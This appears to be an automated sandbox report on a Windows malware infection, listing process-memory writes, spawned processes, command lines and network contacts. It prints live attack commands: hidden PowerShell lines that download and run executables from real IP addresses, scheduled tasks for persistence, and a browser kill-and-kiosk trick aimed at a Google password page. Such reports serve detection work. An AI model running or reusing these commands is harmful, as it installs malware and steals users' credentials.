N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1284 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe
PID 1284 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe
PID 1284 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe
PID 2892 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2892 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 2892 wrote to memory of 4276 N/A C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4276 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe
PID 4276 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe
PID 4276 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe
PID 2076 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe C:\Windows\SysWOW64\cmd.exe
PID 2076 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe C:\Windows\SysWOW64\cmd.exe
PID 2076 wrote to memory of 1836 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe C:\Windows\SysWOW64\cmd.exe
PID 2076 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe C:\Windows\SysWOW64\mshta.exe
PID 2076 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe C:\Windows\SysWOW64\mshta.exe
PID 2076 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe C:\Windows\SysWOW64\mshta.exe
PID 1836 wrote to memory of 4360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1836 wrote to memory of 4360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1836 wrote to memory of 4360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3484 wrote to memory of 868 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3484 wrote to memory of 868 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3484 wrote to memory of 868 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4276 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4276 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4276 wrote to memory of 4680 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 3312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4680 wrote to memory of 3312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4680 wrote to memory of 3312 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 4680 wrote to memory of 2636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 2636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 2636 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2636 wrote to memory of 3904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 3904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2636 wrote to memory of 3904 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4680 wrote to memory of 1160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 1160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 1160 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1160 wrote to memory of 2996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1160 wrote to memory of 2996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1160 wrote to memory of 2996 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 868 wrote to memory of 3780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE
PID 868 wrote to memory of 3780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE
PID 868 wrote to memory of 3780 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE
PID 4680 wrote to memory of 3256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 3256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4680 wrote to memory of 3256 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3256 wrote to memory of 404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3256 wrote to memory of 404 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4680 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4680 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4680 wrote to memory of 4352 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4680 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4680 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 4680 wrote to memory of 1484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\mshta.exe
PID 1484 wrote to memory of 3640 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 3640 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1484 wrote to memory of 3640 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4276 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe
PID 4276 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe
PID 4276 wrote to memory of 860 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe
PID 3640 wrote to memory of 916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 3640 wrote to memory of 916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 3640 wrote to memory of 916 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
PID 4276 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe

"C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe"

C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe

"C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe

"C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn ysksUma2kSs /tr "mshta C:\Users\Admin\AppData\Local\Temp\25OW74QvS.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\25OW74QvS.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn ysksUma2kSs /tr "mshta C:\Users\Admin\AppData\Local\Temp\25OW74QvS.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'W3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10108480121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE

"C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "aPbClmaJWPb" /tr "mshta \"C:\Temp\iH0BXcodL.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\iH0BXcodL.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe

"C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe

"C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe"

C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe

"C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1480 -ip 1480

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1480 -s 812

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe

"C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe"

C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe

"C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe

"C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe"

C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe

"C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe

"C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1952 -parentBuildID 20240401114208 -prefsHandle 1868 -prefMapHandle 1860 -prefsLen 27376 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8990b8ae-a833-4c44-841c-ae4a0209ca20} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2408 -prefsLen 28296 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0b6ece7-2e68-4d23-b9c6-0fdff8149e46} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3252 -childID 1 -isForBrowser -prefsHandle 3216 -prefMapHandle 3272 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5db327ae-8c4b-4101-bb8e-4cdbd912e4cd} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3860 -childID 2 -isForBrowser -prefsHandle 3916 -prefMapHandle 3912 -prefsLen 32786 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {126f1331-6857-434e-8479-8268beb7cd40} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4688 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4660 -prefMapHandle 4680 -prefsLen 32786 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5612e1bc-18af-40e5-9eed-f1310f5806d1} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" utility

C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe

"C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5240 -childID 3 -isForBrowser -prefsHandle 5228 -prefMapHandle 5248 -prefsLen 26976 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3950ba0-39ce-44ba-b6ea-5a025ad51a17} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4388 -childID 4 -isForBrowser -prefsHandle 5164 -prefMapHandle 5260 -prefsLen 26976 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f4e1e00e-06e6-4fc0-a4e5-65aa0706e0f7} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5608 -childID 5 -isForBrowser -prefsHandle 5528 -prefMapHandle 5532 -prefsLen 26976 -prefMapSize 244628 -jsInitHandle 1288 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a6a37b2c-4e4b-4551-845a-73f50c1d5581} 1212 "\\.\pipe\gecko-crash-server-pipe.1212" tab

C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe

"C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe"

C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe"

C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 6120 -ip 6120

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 800

C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 4484 -ip 4484

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4484 -s 808

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe"

C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\96B8.tmp\96B9.tmp\96BA.bat C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 172.67.212.102:443 codxefusion.top tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 172.67.212.102:443 codxefusion.top tcp
US 172.67.212.102:443 codxefusion.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
GB 2.18.66.72:443 www.bing.com tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.64.1:443 exarthynature.run tcp
US 104.21.64.1:443 exarthynature.run tcp
